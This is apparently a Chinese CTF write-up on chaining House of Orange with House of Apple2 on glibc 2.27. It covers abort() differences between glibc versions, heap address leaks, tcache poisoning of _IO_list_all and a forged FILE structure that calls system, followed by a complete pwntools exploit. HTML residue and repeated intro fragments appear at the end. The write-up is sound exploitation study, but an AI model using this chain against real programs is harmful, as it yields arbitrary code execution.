Libc2.27下的House of Orange + House of Apple2攻击技术分析<\/h1>

前言<\/h2>
本文详细分析在libc2.27环境下结合House of Orange和House of Apple2的攻击技术。与libc2.23相比，libc2.27的`abort()<\/code>函数移除了IO相关处理，这使得传统的House of Orange攻击方式需要调整。<\/p>`

malloc_assert在libc2.23与libc2.27的不同<\/h2>
libc2.23的__malloc_assert<\/code><\/h3>
static<\/span> void<\/span> __malloc_assert<\/span>(const<\/span> char<\/span> *<\/span>assertion, const<\/span> char<\/span> *<\/span>file, unsigned<\/span> int<\/span> line, const<\/span> char<\/span> *<\/span>function) {
<\/span><\/span>    (void<\/span>) __fxprintf(NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.<\/span>\n<\/span>"<\/span>,
<\/span><\/span>                      __progname, __progname[0<\/span>] ?<\/span> ": "<\/span> :<\/span> ""<\/span>,
<\/span><\/span>                      file, line,
<\/span><\/span>                      function ?<\/span> function : ""<\/span>, function ?<\/span> ": "<\/span> :<\/span> ""<\/span>,
<\/span><\/span>                      assertion);
<\/span><\/span>    fflush(stderr);
<\/span><\/span>    abort();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>在libc2.23中，abort()<\/code>函数包含IO处理相关函数：<\/p>
void<\/span> abort<\/span>(void<\/span>) {
<\/span><\/span>    struct<\/span> sigaction act;
<\/span><\/span>    sigset_t sigs;
<\/span><\/span>    \/\/ ... 省略部分代码 ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/* Flush all streams. We cannot close them now because the user
<\/span><\/span><\/span>       might have registered a handler for SIGABRT. *\/<\/span>
<\/span><\/span>    if<\/span> (stage ==<\/span> 1<\/span>) {
<\/span><\/span>        ++<\/span>stage;
<\/span><\/span>        fflush(NULL);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ... 省略部分代码 ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/* Now close the streams which also flushes the output the user
<\/span><\/span><\/span>       defined handler might has produced. *\/<\/span>
<\/span><\/span>    if<\/span> (stage ==<\/span> 4<\/span>) {
<\/span><\/span>        ++<\/span>stage;
<\/span><\/span>        __fcloseall();
<\/span><\/span>    }
<\/span><\/span>    \/\/ ... 省略部分代码 ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>libc2.27的__malloc_assert<\/code><\/h3>
libc2.27的abort()<\/code>函数移除了IO处理相关代码：<\/p>
void<\/span> abort<\/span>(void<\/span>) {
<\/span><\/span>    struct<\/span> sigaction act;
<\/span><\/span>    sigset_t sigs;
<\/span><\/span>    \/\/ ... 省略部分代码 ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/* Send signal which possibly calls a user handler. *\/<\/span>
<\/span><\/span>    if<\/span> (stage ==<\/span> 1<\/span>) {
<\/span><\/span>        int<\/span> save_stage =<\/span> stage;
<\/span><\/span>        stage =<\/span> 0<\/span>;
<\/span><\/span>        __libc_lock_unlock_recursive(lock);
<\/span><\/span>        raise(SIGABRT);
<\/span><\/span>        __libc_lock_lock_recursive(lock);
<\/span><\/span>        stage =<\/span> save_stage +<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ ... 省略部分代码 ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击思路演变<\/h2>


传统House of Orange的限制<\/strong>：<\/p>

难以实现像tcache poison一样的任意地址申请<\/li>
通常通过unsorted bin attack触发malloc_assert，利用abort中的IO处理函数遍历_IO_list_all<\/code>进行IO攻击<\/li>
libc2.27中abort移除了IO处理，传统方法失效<\/li>
<\/ul>
<\/li>

新的攻击思路<\/strong>：<\/p>

结合House of Orange和House of Apple2<\/li>
利用libc2.27引入的tcache机制进行tcache poison<\/li>
最终实现任意地址申请和任意地址写任意值<\/li>
<\/ul>
<\/li>
<\/ol>
攻击步骤详解<\/h2>
1. 泄露libc基址和堆基址<\/h3>
add(0x8<\/span>)
<\/span><\/span>edit(0<\/span>, 0x20<\/span>, b<\/span>"a"<\/span>*<\/span>0x18<\/span> +<\/span> p64(0xD91<\/span>))
<\/span><\/span>add(0x1000<\/span>)
<\/span><\/span>add(0x400<\/span>)
<\/span><\/span>edit(0<\/span>, 0x20<\/span>, b<\/span>"a"<\/span>*<\/span>0x18<\/span> +<\/span> b<\/span>"a"<\/span>*<\/span>8<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span>p.<\/span>recvuntil("a"<\/span>*<\/span>0x20<\/span>)
<\/span><\/span>libc.<\/span>address =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)) -<\/span> 0x3EBCA0<\/span> -<\/span> 0x600<\/span>
<\/span><\/span>print(f<\/span>"libc: <\/span>{<\/span>hex(libc.<\/span>address)}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>edit(0<\/span>, 0x30<\/span>, b<\/span>"a"<\/span>*<\/span>0x30<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span>p.<\/span>recvuntil("a"<\/span>*<\/span>0x30<\/span>)
<\/span><\/span>heap_addr =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)) -<\/span> 0x270<\/span>
<\/span><\/span>print(f<\/span>"heap: <\/span>{<\/span>hex(heap_addr)}<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>2. 利用House of Orange+让top chunk进入tcache bin<\/h3>
add(0x310<\/span>)
<\/span><\/span>add(0x5F0<\/span> +<\/span> 0x30<\/span>)
<\/span><\/span>add(0xF60<\/span>)
<\/span><\/span>edit(5<\/span>, 0xF70<\/span>, b<\/span>"a"<\/span>*<\/span>0xF60<\/span> +<\/span> p64(0<\/span>) +<\/span> p64(0x81<\/span>))  # 伪造top chunk大小<\/span>
<\/span><\/span>add(0x100<\/span>)
<\/span><\/span>edit(5<\/span>, 0xF78<\/span>, b<\/span>"a"<\/span>*<\/span>0xF60<\/span> +<\/span> p64(0<\/span>) +<\/span> p64(0x81<\/span>) +<\/span> p64(libc.<\/span>sym['_IO_list_all'<\/span>]))
<\/span><\/span>add(0x58<\/span>)
<\/span><\/span>add(0x58<\/span>)
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

扩展top chunk时，进入unsorted bin或tcache bin的top chunk大小会小0x20<\/li>
因此使用p64(0x81)<\/code>后面是add(0x58)<\/code><\/li>
<\/ul>
3. libc2.27的House of Apple2<\/h3>
由于题目有沙箱限制，不能直接攻击malloc_hook<\/code>和one_gadget<\/code>，转而攻击IO结构：<\/p>
ioaddr =<\/span> heap_addr +<\/span> 0x260<\/span>
<\/span><\/span>payload =<\/span> p64(0<\/span>)*<\/span>2<\/span> +<\/span> p64(1<\/span>) +<\/span> p64(2<\/span>)  # 满足FSOP条件<\/span>
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x78<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(heap_addr)  # lock<\/span>
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x90<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(ioaddr +<\/span> 0xe0<\/span>)  # _wide_data<\/span>
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0xc8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(libc.<\/span>sym['_IO_wfile_jumps'<\/span>])  # vtable<\/span>
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0xd0<\/span> +<\/span> 0x130<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(ioaddr +<\/span> 0xe0<\/span> +<\/span> 0x138<\/span>)  # _wide_data->vtable<\/span>
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0xd0<\/span> +<\/span> 0x138<\/span> +<\/span> 0x68<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(libc.<\/span>sym['system'<\/span>])
<\/span><\/span>payload =<\/span> b<\/span>' sh;<\/span>\x00\x00\x00<\/span>'<\/span> +<\/span> p64(0<\/span>) +<\/span> payload
<\/span><\/span>
<\/span><\/span>edit(0<\/span>, len(payload), payload)
<\/span><\/span>edit(8<\/span>, 8<\/span>, p64(heap_addr +<\/span> 0x260<\/span>))
<\/span><\/span>choice(0<\/span>)  # 触发exit，执行IO攻击<\/span>
<\/span><\/span><\/code><\/pre>libc2.27的特殊调整<\/strong>：<\/p>

wide_data<\/code>的vtable<\/code>偏移为0x130（高版本为0xe0）<\/li>
需要正确设置_wide_data->vtable<\/code>指针<\/li>
<\/ul>
其他可能的攻击方式<\/h2>
有了任意地址申请能力后，还可以考虑：<\/p>

攻击tcache_pthread_struct<\/code>控制tcache<\/li>
利用environ<\/code>泄露栈地址进行ROP<\/li>
直接修改__free_hook<\/code>或__malloc_hook<\/code><\/li>
<\/ol>
调试技巧<\/h2>
当题目提供的libc没有符号表时：<\/p>

从glibc-all-in-one中找到相同版本的有符号表的libc<\/li>
这样pwndbg可以更好地设置断点进行调试<\/li>
<\/ul>
完整EXP<\/h2>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context(os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>, log_level=<\/span>'debug'<\/span>)
<\/span><\/span>p =<\/span> process("\/home\/zp9080\/PWN\/pwn"<\/span>)
<\/span><\/span># p=gdb.debug("\/home\/zp9080\/PWN\/pwn",'b *0x4013D2')<\/span>
<\/span><\/span># p=remote('8.147.134.27',36901)<\/span>
<\/span><\/span>elf =<\/span> ELF("\/home\/zp9080\/PWN\/pwn"<\/span>)
<\/span><\/span>libc =<\/span> elf.<\/span>libc
<\/span><\/span>
<\/span><\/span>def<\/span> dbg<\/span>():
<\/span><\/span>    gdb.<\/span>attach(p, 'b *$rebase(0x1B56)'<\/span>)
<\/span><\/span>    pause()
<\/span><\/span>
<\/span><\/span>def<\/span> choice<\/span>(idx):
<\/span><\/span>    p.<\/span>sendlineafter("exit:<\/span>\n<\/span>"<\/span>, str(idx))
<\/span><\/span>
<\/span><\/span>def<\/span> add<\/span>(size):
<\/span><\/span>    choice(1<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter("add:<\/span>\n<\/span>"<\/span>, str(size))
<\/span><\/span>
<\/span><\/span>def<\/span> show<\/span>(idx):
<\/span><\/span>    choice(3<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter("show:<\/span>\n<\/span>"<\/span>, str(idx))
<\/span><\/span>    p.<\/span>recvuntil(f<\/span>" <\/span>{<\/span>idx}<\/span> : "<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> edit<\/span>(idx, size, data):
<\/span><\/span>    choice(4<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter("edit:<\/span>\n<\/span>"<\/span>, str(idx))
<\/span><\/span>    p.<\/span>sendlineafter("size<\/span>\n<\/span>"<\/span>, str(size))
<\/span><\/span>    p.<\/span>sendafter("input<\/span>\n<\/span>"<\/span>, data)
<\/span><\/span>
<\/span><\/span># 泄露libc和heap地址<\/span>
<\/span><\/span>add(0x8<\/span>)
<\/span><\/span>edit(0<\/span>, 0x20<\/span>, b<\/span>"a"<\/span>*<\/span>0x18<\/span> +<\/span> p64(0xD91<\/span>))
<\/span><\/span>add(0x1000<\/span>)
<\/span><\/span>add(0x400<\/span>)
<\/span><\/span>edit(0<\/span>, 0x20<\/span>, b<\/span>"a"<\/span>*<\/span>0x18<\/span> +<\/span> b<\/span>"a"<\/span>*<\/span>8<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span>p.<\/span>recvuntil("a"<\/span>*<\/span>0x20<\/span>)
<\/span><\/span>libc.<\/span>address =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)) -<\/span> 0x3EBCA0<\/span> -<\/span> 0x600<\/span>
<\/span><\/span>print(f<\/span>"libc: <\/span>{<\/span>hex(libc.<\/span>address)}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>edit(0<\/span>, 0x30<\/span>, b<\/span>"a"<\/span>*<\/span>0x30<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span>p.<\/span>recvuntil("a"<\/span>*<\/span>0x30<\/span>)
<\/span><\/span>heap_addr =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)) -<\/span> 0x270<\/span>
<\/span><\/span>print(f<\/span>"heap: <\/span>{<\/span>hex(heap_addr)}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span># House of Orange+攻击<\/span>
<\/span><\/span>add(0x310<\/span>)
<\/span><\/span>add(0x5F0<\/span> +<\/span> 0x30<\/span>)
<\/span><\/span>add(0xF60<\/span>)
<\/span><\/span>edit(5<\/span>, 0xF70<\/span>, b<\/span>"a"<\/span>*<\/span>0xF60<\/span> +<\/span> p64(0<\/span>) +<\/span> p64(0x81<\/span>))
<\/span><\/span>add(0x100<\/span>)
<\/span><\/span>edit(5<\/span>, 0xF78<\/span>, b<\/span>"a"<\/span>*<\/span>0xF60<\/span> +<\/span> p64(0<\/span>) +<\/span> p64(0x81<\/span>) +<\/span> p64(libc.<\/span>sym['_IO_list_all'<\/span>]))
<\/span><\/span>add(0x58<\/span>)
<\/span><\/span>add(0x58<\/span>)
<\/span><\/span>
<\/span><\/span># House of Apple2攻击<\/span>
<\/span><\/span>ioaddr =<\/span> heap_addr +<\/span> 0x260<\/span>
<\/span><\/span>payload =<\/span> p64(0<\/span>)*<\/span>2<\/span> +<\/span> p64(1<\/span>) +<\/span> p64(2<\/span>)
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x78<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(heap_addr)
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x90<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(ioaddr +<\/span> 0xe0<\/span>)
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0xc8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(libc.<\/span>sym['_IO_wfile_jumps'<\/span>])
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0xd0<\/span> +<\/span> 0x130<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(ioaddr +<\/span> 0xe0<\/span> +<\/span> 0x138<\/span>)
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0xd0<\/span> +<\/span> 0x138<\/span> +<\/span> 0x68<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(libc.<\/span>sym['system'<\/span>])
<\/span><\/span>payload =<\/span> b<\/span>' sh;<\/span>\x00\x00\x00<\/span>'<\/span> +<\/span> p64(0<\/span>) +<\/span> payload
<\/span><\/span>
<\/span><\/span>edit(0<\/span>, len(payload), payload)
<\/span><\/span>edit(8<\/span>, 8<\/span>, p64(heap_addr +<\/span> 0x260<\/span>))
<\/span><\/span>choice(0<\/span>)
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>总结<\/h2>
本文详细分析了在libc2.27环境下结合House of Orange和House of Apple2的攻击技术，重点包括：<\/p>

libc2.27与libc2.23在abort实现上的差异<\/li>
如何利用House of Orange+实现tcache poison<\/li>
在libc2.27中调整House of Apple2攻击的特殊处理<\/li>
完整的攻击流程和EXP实现<\/li>
<\/ol>
这种组合攻击技术在没有直接任意地址写的情况下，通过精心构造堆布局和IO结构，最终实现了任意代码执行。<\/p>
Libc2.27下的House of Orange + House of Apple2攻击技术分析<\/h1>

前言<\/h2> 本文详细分析在libc2.27环境下结合House of Orange和House of Apple2的攻击技术。与libc2.23相比，libc2.27的abort()<\/code>函数移除了IO相关处理，这使得传统的House of Orange攻击方式需要调整。<\/p>

攻击步骤详解<\/h2>

前言<\/h2>
本文详细分析在libc2.27环境下结合House of Orange和House of Apple2的攻击技术。与libc2.23相比，libc2.27的`abort()<\/code>函数移除了IO相关处理，这使得传统的House of Orange攻击方式需要调整。<\/p>`
